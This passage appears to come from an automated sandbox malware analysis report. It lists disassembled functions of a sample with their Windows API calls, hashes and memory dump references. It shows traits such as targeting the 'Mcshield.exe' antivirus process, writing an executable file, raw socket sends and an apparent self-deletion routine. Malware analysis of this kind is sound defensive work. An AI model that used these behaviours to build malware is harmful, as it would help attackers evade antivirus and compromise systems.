                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: inet_addrmemcpy$Socketgethostbynamememsetsendtowsprintf
                                                                    • String ID: E
                                                                    • API String ID: 2644793219-3568589458
                                                                    • Opcode ID: cb87ba47c29b25ab95e5c56f46f58b123389caa2f866df9b24f0b39722c2724f
                                                                    • Instruction ID: bb30138cef0fcda9b6f1e9f293dbdcda00f04fd2ff6ea86282fbc1aa616be411
                                                                    • Opcode Fuzzy Hash: cb87ba47c29b25ab95e5c56f46f58b123389caa2f866df9b24f0b39722c2724f
                                                                    • Instruction Fuzzy Hash: EF5183B1D5035CBAEB119BE4CC85FEE7678AF05304F00116AF204F71D1DBB85A458BAA
                                                                    Function 004096B3 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetupDiGetClassDevsA.SETUPAPI(00000000,10012074,00000000,00000006), ref: 004096D5
                                                                    • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 004096FA
                                                                    • LocalFree.KERNEL32(00000000), ref: 00409773
                                                                    • _strcmpi.MSVCRT ref: 004097B1
                                                                    • SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,?,00000014), ref: 004097E2
                                                                    • SetupDiCallClassInstaller.SETUPAPI(00000012,00000000,0000001C), ref: 004097F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Setup$Class$CallDeviceDevsEnumFreeInfoInstallInstallerLocalParams_strcmpi
                                                                    • String ID: 0Lv
                                                                    • API String ID: 1468167468-1912672655
                                                                    • Opcode ID: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
                                                                    • Instruction ID: 8a1ef0a1f766ea71d82b3db24a3f597cfc1408b18940f04f0489504e320b8b10
                                                                    • Opcode Fuzzy Hash: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
                                                                    • Instruction Fuzzy Hash: 74412E72A0022DBEEB119FA1DC84FEF7BBCEB09350F504166F605E2191DB349A45CBA5
                                                                    Function 004103FC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 139registrystringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041041B
                                                                    • strrchr.MSVCRT ref: 00410425
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 00410446
                                                                    • memset.MSVCRT ref: 00410480
                                                                    • wsprintfA.USER32 ref: 00410498
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 004104B8
                                                                    • memset.MSVCRT ref: 004104D3
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041054A
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410583
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Open$CreateProcesslstrcpystrrchrwsprintf
                                                                    • String ID: D
                                                                    • API String ID: 1521284123-2746444292
                                                                    • Opcode ID: 90c057d078babe5f51cd46efd09628ced005450d3b914ad0ffbbfc64cedbbe1e
                                                                    • Instruction ID: 1691da09e9a5c49663ba7eeaddb6c90350f6858d713a68390bb3617ab670e3f6
                                                                    • Opcode Fuzzy Hash: 90c057d078babe5f51cd46efd09628ced005450d3b914ad0ffbbfc64cedbbe1e
                                                                    • Instruction Fuzzy Hash: 95414C7290022CBADB21DB91CD88EEF7B7CEB48345F1400A6F605E2050E7759B89CFA4
                                                                    Function 00409939 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 52networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 0040993E
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 0040998F
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040999A
                                                                    • memcpy.MSVCRT(?,?,00000006), ref: 004099CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEventH_prologStartupmemcpy
                                                                    • String ID: A$G$Q$f$f$s
                                                                    • API String ID: 2412012656-2839265054
                                                                    • Opcode ID: 41ca1435b9e337cb6a8c6101f2f86ba35c0e60bfd13b9cf5a9be400d5f86d851
                                                                    • Instruction ID: 99023da4bd752cc8f2d5e82ef9931aadfc09b08b2fa607e3e5df19ba22c18aa5
                                                                    • Opcode Fuzzy Hash: 41ca1435b9e337cb6a8c6101f2f86ba35c0e60bfd13b9cf5a9be400d5f86d851
                                                                    • Instruction Fuzzy Hash: D011B471804394DEE721DBA8C945BDFBBF89F11708F00045EA08263283DBB95B08C7A6
                                                                    Function 0040F410 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 261stringlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Librarystrstr$CloseFreeHandleLoadlstrcmpilstrcpylstrlen
                                                                    • String ID: Mcshield.exe
                                                                    • API String ID: 1409440439-931917054
                                                                    • Opcode ID: 52d0e8ba549a091069c9d0fe9cc9b3e36a9947ec2f7a311238eda45ef7237df1
                                                                    • Instruction ID: f62efb69b0cffb9155b0f8b30fa5607ade772a2bf4a1183a0797c6add752d2d3
                                                                    • Opcode Fuzzy Hash: 52d0e8ba549a091069c9d0fe9cc9b3e36a9947ec2f7a311238eda45ef7237df1
                                                                    • Instruction Fuzzy Hash: FAF147B09052E9AADF60CF5199886CEBF35FB05740F90C1D8914A7F250CBBA8AC5CF94
                                                                    Function 0040D9EE Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115filesleeplibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(100120D8), ref: 0040DA12
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040DA61
                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040DA7C
                                                                    • memset.MSVCRT ref: 0040DA98
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040DAE0
                                                                    • CloseHandle.KERNEL32(?), ref: 0040DAF3
                                                                    • Sleep.KERNEL32(00000001), ref: 0040DAFE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040DB1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FileFree$CloseCreateHandleLoadSleepWritememset
                                                                    • String ID: MZ
                                                                    • API String ID: 232095334-2410715997
                                                                    • Opcode ID: fa54ab4ebb18c9fa3d6be94cdfc93ee988d104a43be56b14d9d04797eb88be96
                                                                    • Instruction ID: 804f3ce74eb9ec07d3a4785141846b4eccf958cd6a94669acf9580ab4cb2f1a7
                                                                    • Opcode Fuzzy Hash: fa54ab4ebb18c9fa3d6be94cdfc93ee988d104a43be56b14d9d04797eb88be96
                                                                    • Instruction Fuzzy Hash: 563127B1C0421CBEEB119FE0CC84EFFBF78EB45394F10406AF615A2291D6354E99CAA4
                                                                    Function 004112B6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00411314
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00411329
                                                                    • GetEnvironmentVariableA.KERNEL32(10012D24,?,00000104), ref: 0041133C
                                                                    • ShellExecuteEx.SHELL32(?), ref: 004113A7
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 004113C2
                                                                    • GetCurrentThread.KERNEL32 ref: 004113CD
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 004113D4
                                                                    • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004113E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentNameThread$ChangeEnvironmentExecuteFileModuleNotifyPathPriorityProcessShellShortVariable
                                                                    • String ID: <
                                                                    • API String ID: 199731047-4251816714
                                                                    • Opcode ID: 9aacd80e804f47dad66334d012e1028adeafb23ef1bf07abbc5e11af2e7fab23
                                                                    • Instruction ID: a2a66757deb701b56a8598c8e5cfb2a82cafe20b1eaa55c999f94f7df8e00e4f
                                                                    • Opcode Fuzzy Hash: 9aacd80e804f47dad66334d012e1028adeafb23ef1bf07abbc5e11af2e7fab23
                                                                    • Instruction Fuzzy Hash: E931CFB290122DBFEB11DBA5DC88FDEBB7CEB08750F0004A6E709E6154DA745A84CF65
                                                                    Function 0040E88C Relevance: 15.1, APIs: 10, Instructions: 83fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E8C1
                                                                    • _mbscat.MSVCRT ref: 0040E8D3
                                                                    • _mbscat.MSVCRT ref: 0040E8E4
                                                                    • _mbscat.MSVCRT ref: 0040E8F5
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040E914
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E925
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040E92E
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E940
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040E960
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E96A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File_mbscat$??2@??3@CloseCreateDirectoryHandleReadSizeSystem
                                                                    • String ID:
                                                                    • API String ID: 2093794097-0
                                                                    • Opcode ID: 738fe28d4748b2df2ccd4bdbc4372e6d52f4114cdf7a34d9b54d6684056bd669
                                                                    • Instruction ID: a3e8788008f8b6bb81d4a796fe760d851dfb02e15db184ef721ffd0e70175268
                                                                    • Opcode Fuzzy Hash: 738fe28d4748b2df2ccd4bdbc4372e6d52f4114cdf7a34d9b54d6684056bd669
                                                                    • Instruction Fuzzy Hash: 2921C7B1D0431CBBEB119BB5CC86EDE7B7CEB08354F1404AAF214F2191DAB45E908A54
                                                                    Function 0040C9B3 Relevance: 15.1, APIs: 10, Instructions: 79fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040C9CB
                                                                    • _mbscat.MSVCRT ref: 0040C9DD
                                                                    • _mbscat.MSVCRT ref: 0040C9EE
                                                                    • _mbscat.MSVCRT ref: 0040C9FF
                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0040CA20
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA2E
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040CA42
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040CA56
                                                                    • WriteFile.KERNEL32(?,00000000,00000000), ref: 0040CA83
                                                                    • CloseHandle.KERNEL32(?), ref: 0040CA8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
